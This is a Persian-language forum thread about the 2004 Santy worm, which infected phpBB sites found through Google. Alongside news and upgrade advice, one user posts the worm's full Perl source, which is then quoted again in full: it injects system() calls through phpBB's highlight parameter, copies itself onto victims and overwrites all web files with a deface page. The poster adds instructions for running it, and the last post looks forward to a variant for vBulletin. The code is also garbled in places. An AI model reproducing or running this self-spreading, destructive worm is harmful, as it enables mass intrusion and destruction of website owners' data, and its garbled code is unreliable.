ابتلا به يك worm از طریق phpbb

[ehsan]

ظاهرا worm جدیدی سایتهای phpbb رو هدف خودش قرارداده و از طریق این سایتها، اقدام به Deface کردن سایت می کنه. خلاصه اگه phpbb دارد حتما اون رو upgrade کنید.
اطلاعات بیشتر درباره این خبر:
http://news.bbc.co.uk/1/hi/technology/4117711.stm

راه حل مقابله با این ویروس:
ارتقا نسخه php به یکی از آخرین نسخه ها... 4.3.10 و یا 5.0.3 البته ظاهرا phpbb هنوز با php 5 مشکل داره.
اطلاعات بیشتر:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=248046


افرادی که روی Shared Hosting هستند و حتی از phpbb استفاده نمیکنند ممکنه به این worm مبتلا بشند و در سایت و صفحات سایتشون تغییرات ناخواسته ایجاد کنه. لازمه که کلیه فایلهای php و asp و htm یا html خودشون رو روی پرمیشن 644 قرار دهند.

[mehrdad1355]

به گفته‌ي كارشناسان امور امنيتي، به تازگي يك كرم اينترنتي با استفاده از موتور جستجوي گوگل، قرباني‌هاي خود را پيدا مي‌كند.

كرم اينترنتي Santy، از طريق برنامه‌ي phpBB (سرنام PHP Bulletin Board) كه يكي از معروف‌ترين برنامه‌هاي قابل استفاده در فروم‌ها است، انتشار مي‌يابد. طبق تحقيقات به عمل آمده، اين كرم اينترنتي، براي يافتن سايت‌هايي كه از برنامه‌ي مذكور استفاده مي‌كنند، از موتور جستجوي گوگل بهره مي‌برد.
طبق اخبار منتشره، اين كرم تاكنون 40000 سايت اينترنتي در سرتاسر دنيا را آلوده كرده و پيش بيني مي‌شود در روز‌هاي آينده، سايت‌هاي بيشتري مورد هجوم قرار بگيرند.
اين كرم، بعد از نفوذ به سايت قرباني، تمامي فايل‌هاي HTML، ASP، PHP و JSP را حذف و فايلي با متن This site is defaced!!! This site is defaced!!! NeverEverNoSanity WebWorm generation X
را جايگزين آنها مي‌نمايد. طبق اعلام نظر كارشناسان شركت Kaspersky (يكي از شركت‌هاي فعال در زمينه‌ي توليد برنامه‌هاي ضد ويروس) تا كنون 24 گونه‌ي مختلف از اين كرم شناسايي شده‌اند و به نظر مي‌رسد در حال حاضر، بهترين راه مقابله با انتشار اين كرم اينترنتي، بروزرساني برنامه‌ي phpBB است.
مسولان گوگل تا كنون در اين باره اظهار نظري نكردند و ساعاتي پيش سخنگوي اين شركت گفت كه در حال حاضر، كارشناسان شركت در حال بررسي اطلاعات جمع‌آوري شده‌اند و بزودي نتايج بررسي‌هاي خود را در اختيار كاربران قرار خواهند داد.

[mehrdad1355]

راستی دیروز سایت ایرونی کید همینطوری دیفیس شده بود ولی سرورش با ری استور بک اپ درستش کرد

[amir abbas]

درسته
اسم این کرم santy هستش که از عصر سه شنبه تا حالا نزدیک به 50 هزار سایت رو از کار انداخته
همه شرکت های آنتی ویروس بسیج شدن که جلوشو بگیرن

این سورس همون کرم هستش

Code:

#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# -SECU For educational purpose
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#!/usr/bin/perl
use
strict;
use Socket;

sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };

my $generation = x;
PayLoad() if $generation > 3;

open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;

while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}

$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;

my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';

while(1) {
exit if -e 'stop.it';

OUTER: for my $url (GoGoogle()) {

exit if -e 'stop.it';

$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



sub str2chr($) {
my $s = shift;

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;

return $s;
}


sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) .
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}

return @urls;
}


sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;

my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

my $port = 80;
if($host =~ /(.*)sad.gif\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join '', <Server>;
close (Server);

return $answer;
}


sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};

unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


sub DoDir($) {

my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;

local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


sub Pay Load() {

my @dirs;


eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, '/ ');

for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}

برای کامپایل کردنش هم باید توی یک فایل متنی ذخیره کنیدش و پسوند فایل رو به pl تغییر بدید البته باید active perl داشته باشید

[davidmors]

Quote:

نوشته ای از amir abbas

درسته
اسم این کرم santy هستش که از عصر سه شنبه تا حالا نزدیک به 50 هزار سایت رو از کار انداخته
همه شرکت های آنتی ویروس بسیج شدن که جلوشو بگیرن

این سورس همون کرم هستش

Code:

#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# -SECU For educational purpose
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#!/usr/bin/perl
use
strict;
use Socket;

sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };

my $generation = x;
PayLoad() if $generation > 3;

open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;

while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}

$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;

my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';

while(1) {
exit if -e 'stop.it';

OUTER: for my $url (GoGoogle()) {

exit if -e 'stop.it';

$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



sub str2chr($) {
my $s = shift;

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;

return $s;
}


sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) .
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}

return @urls;
}


sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;

my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

my $port = 80;
if($host =~ /(.*)sad.gif\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join '', <Server>;
close (Server);

return $answer;
}


sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};

unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


sub DoDir($) {

my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;

local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


sub Pay Load() {

my @dirs;


eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, '/ ');

for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}

برای کامپایل کردنش هم باید توی یک فایل متنی ذخیره کنیدش و پسوند فایل رو به pl تغییر بدید البته باید active perl داشته باشید

بابا مخ
بابا اطلاعات
موندم تو كف
ايول

[Azemati]

اين كرم سايت‌هاي phpbb رو چه جوري پيدا مي كنه!؟ خود به خود؟
يا بايد يكي خودش كرم بريزه؟

[ehsan]

Quote:

نوشته ای از azemati

اين كرم سايت‌هاي phpbb رو چه جوري پيدا مي كنه!؟ خود به خود؟
يا بايد يكي خودش كرم بريزه؟

با استفاده از گوگل... توی اون لینکها و مطلب مهرداد یه توضحاتی نوشته. که برای نسخه های upgrade نشده search میکنن
حتما باید phpbb خود رو به آخرین نسخه upgrade کنید.

[artin]

phpBB 2.0.11
حتما به این نسخه اپگرید کنید

[artin]

آخرین ورژن پی اپ پی بی بی هم حک شد
http://www.securityfocus.com/archive...2/2004-12-28/0

[mehrdad1355]

می گم چرا سایت عابر بسته هست

[sina1808]

پهناي باند تموم كرده ديگه !

[Azemati]

http://news.tarashe.com/categories/s...y/002518.shtml

سانتی گوگل به یاهو و AOL نیز حمله کرد!
چند روز پس از آنکه ویروس سانتی، گوگل را هدف قرار داد و از آن بعنوان یافتن سرورهای وب آسیب پذیر استفاده کرد، کارشناسان امنیتی اخطار داده‌اند که نمونه‌های جدید این ویروس در تدارک حمله‌ای گسترده نه تنها بسوی گوگل بلکه به سوی سایر موتورهای جستجو هستند.

به گزارش بخش خبر تراشه ...

[mehrdad1355]

نه بابا قبل اون هم یه پیام فارسی رو سایت بود که سایت فعلا تعطیله الان که اصلا نمی یاد و ظاهراه عابر تموم کرده(البته پهنای باندو)!!
یه دوماهی هست که این عابر(سایتش) قاطی داره و تق و لقه!!

[4shir]

سلام بابا كلي خنديدم ببينيد اين كرم با سرچ كردن عبارت
http://\S+viewtopic.php\S+)#g
يك چيزي مثل اين در گوگل به پيدا كردن هاستهاي كه اين فايل رو دارن ميكگنه و بعد با استفاده از باگي كه يك ماه پيش براي اين فايل اومده بود شروع بع اكسپوليت كردن و بعد ديفيس كردن سايت ميكنه نه تنها بي بي بلكه ipb و vb رو هم هك كرده ميگيد نه بريد توي سايت من يا سايت مجيد تاپيكش هست ليست سايتهاي رو كه زده ميتونيد ببينيد كه از چه برنامه هاي استفاده كرده بودن و سايتشون هك شده بعدش هم شما با پتچ كردن ميتونستيد جلوي اين كرم رو بگيريد و نيازي به اپگريد نبود سوم نسخه 11 هنوز اكسپوليتش رسما منتشر نشده به سورت زيرزميني هست ولي باگ خيلي جالبي داره نسخه VB هم كه باگش پابليك شد امروز فرداست كه با دستكاري سورس همين ورم يك مرم هم براي vbبياد كه خفن حال كنيم